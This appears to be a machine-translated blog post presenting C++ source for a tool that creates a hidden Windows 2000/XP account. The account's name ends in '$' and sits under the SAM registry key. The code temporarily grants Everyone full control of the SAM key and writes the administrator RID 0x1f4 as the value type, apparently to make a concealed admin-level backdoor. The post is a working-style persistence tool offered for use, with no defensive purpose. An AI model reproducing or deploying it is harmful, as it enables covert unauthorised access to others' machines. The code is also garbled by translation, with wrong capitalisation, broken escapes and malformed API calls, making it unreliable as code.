Add a hidden account

To add a hidden account,
Add the following in the registry:

Therefore, set this [HKEY_LOCAL_MACHINE/SAM/domains/account/users/names/A $]
@ = Hex (1f4 ):

It is valid for 2000 and XP, but after restart, it cannot be opened in the management tool.

In XP, the start section can only be used for classic login. That is, you can enter CTRL + ALT + DEL twice!

The Code is based on the Internet. It is very simple, but the above registry key value is added!
XP + vs.net 2003 compiled

// Creatadmin. cpp: defines the entry point of the console application.
//

# Include "stdafx. H"
# Include <windows. h>
# Include <aclapi. h>

/* Add a new "$" user to Sam/SAM/domains/account/users // names under the Sam key of the Registry to hide it. In 2000, test in XP
Problem: after 2000 is restarted, the local users and groups in the computer management tool will no longer be displayed.
The XP startup interface can only be accessed in the classic login mode, that is, double-click CTRL + ALT + DEL to log on !!! */
Void _ tmain (INT argc, _ tchar * argv [])
{
STD: string Sam = "Sam // domains // account // users // names ";
If (argc! = 2)
{
Printf ("Welcome to http: // systest2005.52blog.net/nmail to: systest2005@126.com! ");
Printf ("/Nyou must input the name of administrators you want to create! ");
Printf ("/nusage: % s name", argv [0]);
Printf ("/n <Name> must end with $ ");
Exit (0 );
}
Int n = strlen (argv [1]);
If (argv [1] [n-1]! = '$ ')
{
Printf ("the name must end with $ ");
Exit (0 );
}
Char * s = argv [1];

/* The following code is searched online and I do not know the first source */
DWORD dwret;
Lpstr samname = "machine // Sam ";
Psecurity_descriptor PSD = NULL;
PACl polddacl = NULL;
PACl pnewdacl = NULL;
Explicit_access EA;
Hkey = NULL;
Hkey mkey = NULL;

// Obtain the DACL of the SAM primary key
Dwret = getnamedsecurityinfo (samname, se_registry_key, dacl_security_information,
Null, null, & polddacl, null, & PSD );
If (dwret! = Error_success)
{
Printf ("getnamedsecurityinfo error: % d/N", dwret );
Goto freeandexit;
}

// Create an ace that allows everyone to fully control objects and allows sub-objects to inherit this permission
Zeromemory (& EA, sizeof (explicit_access ));
Buildexplicitaccesswithname (& EA, "everyone", key_all_access, set_access,
Sub_containers_and_objects_inherit );

// Add the new ACE to the DACL
Dwret = setentriesinacl (1, & EA, polddacl, & pnewdacl );
If (dwret! = Error_success)
{
Printf ("setentriesinacl error: % d/N", dwret );
Goto freeandexit;
}

// Update the DACL of the SAM primary key
Dwret = setnamedsecurityinfo (samname, se_registry_key, dacl_security_information,
Null, null, pnewdacl, null );
If (dwret! = Error_success)
{
Printf ("setnamedsecurityinfo error: % d/N", dwret );
Goto freeandexit;
}

// Enable the sub-Key of Sam
Dwret = regopenkeyex (HKEY_LOCAL_MACHINE, "Sam // domains // account // users // names //",
0, key_all_access, & hkey );
If (dwret! = Error_success)
{
Printf ("Reg open key error: % d/N", dwret );
Goto freeandexit;
}
Dwret = regcreatekey (hkey, S, & mkey );
If (dwret! = Error_success)
{
Printf ("Reg creatkey error: % d/N", dwret );
Goto freeandexit;
}

Dwret = regsetvalueex (mkey, null, null, 0x1f4, null, 0 );
If (dwret! = Error_success)
{
Printf ("set key value error: % d/N", dwret );
Goto freeandexit;
}
Printf ("create Sam subkey successfully./N ");
Regclosekey (hkey );
Regclosekey (mkey );

Freeandexit:
If (hkey) regclosekey (hkey );
If (pnewdacl) localfree (pnewdacl );
// Restore the DACL of the SAM primary key
If (polddacl) setnamedsecurityinfo (samname, se_registry_key, dacl_security_information,
Null, null, polddacl, null );
If (PSD) localfree (PSD );
Return;

}